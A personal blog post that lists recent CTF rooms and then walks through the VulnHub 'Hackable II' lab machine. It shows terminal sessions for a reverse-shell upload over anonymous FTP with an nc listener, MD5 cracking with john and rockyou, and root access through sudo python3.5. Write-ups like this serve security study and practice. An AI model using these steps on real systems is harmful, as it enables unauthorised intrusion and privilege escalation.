Updates 24 June 2021
Away
I was away for a few days with just an old laptop setup with Kali as the OS. It didn’t have enough grunt to run any VMs, so it was THM only. Since there wasn’t much new I went and did a few older CTFs that I hadn’t done before:
- Pickle Rick. I tried to watch one episode of Rick and Morty once and was like meh and turned it off; why is this fandom so annoying? Anyway, nothing really new to report from this.
- Biohazard. This was an older Resident Evil themed CTF and it was super CTF. But it was okay, just a bit annoying to do with a barely functional touchpad and no mouse.
- I’d already done Juicy Details but it was just reading logs and answering questions, no big deal.
- Volatility. This was actually interesting. However Volaltility is no longer in the Kali repo and installing it is a pain is the ass, and the room doesn’t tell you how to do it. May do some more in this field. It’s a bit like the Autopsy thing; maybe it’s just because it’s novel but I found it interesting.
Then I got home and tried to do HackathonCTF: 2 from VulnHub but the stupid thing wouldn’t get an IP address either as bridged or NAT. Deleted.
Next, I tried https://www.vulnhub.com/entry/hackable-ii,711/. It took like 10 minutes.
Ports
HTTP, SSH and FTP. Let’s begin with FTP.
FTP
We have anonymous login with upload, and the directory contains a HTML file. HMMMMMMM WONDER WHAT THAT MEANS?
──(root💀kali)-[/opt/vulnhub/hackable]
└─# ftp 192.168.1.63
Connected to 192.168.1.63.
220 ProFTPD Server (ProFTPD Default Installation) [192.168.1.63]
Name (192.168.1.63:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xrwx 2 33 33 4.0k Nov 26 2020 .
drwxr-xrwx 2 33 33 4.0k Nov 26 2020 ..
-rw-r--r-- 1 0 0 109 Nov 26 2020 CALL.html
226 Transfer complete
ftp> get CALL.html
local: CALL.html remote: CALL.html
200 PORT command successful
150 Opening BINARY mode data connection for CALL.html (109 bytes)
226 Transfer complete
109 bytes received in 0.00 secs (44.4077 kB/s)
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful
150 Opening BINARY mode data connection for test.txt
226 Transfer complete
5 bytes sent in 0.00 secs (68.7720 kB/s)
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful
150 Opening BINARY mode data connection for shell.php
226 Transfer complete
5495 bytes sent in 0.00 secs (134.3703 MB/s)And where did our shell go?
┌──(root💀kali)-[/opt/vulnhub/hackable]
└─# cat CALL.html
<html>
<head>
<title>onion</title>
</head>
<body>
<h1>GET READY TO RECEIVE A CALL</h1>
</body>
</html>
┌──(root💀kali)-[/opt/vulnhub/hackable]
└─# python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.63
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10848
Error Log: /opt/dirsearch/logs/errors-21-06-24_07-35-13.log
Target: http://192.168.1.63/
Output File: /opt/dirsearch/reports/192.168.1.63/_21-06-24_07-35-13.txt
[07:35:13] Starting:
# 403s removed
[07:35:22] 301 - 312B - /files -> http://192.168.1.63/files/ [07:35:22] 200 - 1KB - /files/
[07:35:23] 200 - 11KB - /index.html [07:35:27] 403 - 277B - /server-status/ [07:35:27] 403 - 277B - /server-status
Task Completed Start a listener and go to http://192.168.1.63/files/shell.php:
┌──(root💀kali)-[/opt/vulnhub/hackable]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.63] 49574
Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
08:37:20 up 5 min, 0 users, load average: 0.14, 0.09, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ sudo -l
sudo: no tty present and no askpass program specified
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/$Root
www-data@ubuntu:/home$ ls -lash
ls -lash
total 16K
4.0K drwxr-xr-x 3 root root 4.0K Nov 26 2020 .
4.0K drwxr-xr-x 23 root root 4.0K Nov 26 2020 ..
4.0K -rw-r--r-- 1 root root 43 Nov 26 2020 important.txt
4.0K drwxr-xr-x 4 shrek shrek 4.0K Jun 15 13:34 shrek
www-data@ubuntu:/home$ cat im
cat important.txt
run the script to see the data
/.runme.shRun a random script in a CTF without checking the contents? Erm, no thanks.
www-data@ubuntu:/$ cat .runme.sh
cat .runme.sh
#!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
# guff removed
shrek:cf4c2232354952690368f1b3dfdfb24d'Uh huh.
┌──(root💀kali)-[/opt/vulnhub/hackable]
└─# john hash -w=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
onion (?)
1g 0:00:00:00 DONE (2021-06-24 07:39) 50.00g/s 3302Kp/s 3302Kc/s 3302KC/s panteraroz..jorie
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completedNow what?
www-data@ubuntu:/$ su shrek
su shrek
Password: onion
shrek@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5
shrek@ubuntu:/$ sudo -u root /usr/bin/python3.5 -c 'import os;os.system("/bin/bash")'
<t /usr/bin/python3.5 -c 'import os;os.system("/bin/bash")'
root@ubuntu:/# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Thu Jun 24 08:39:36 -03 2021
root@ubuntu:/#Almost took longer to write this than to do it.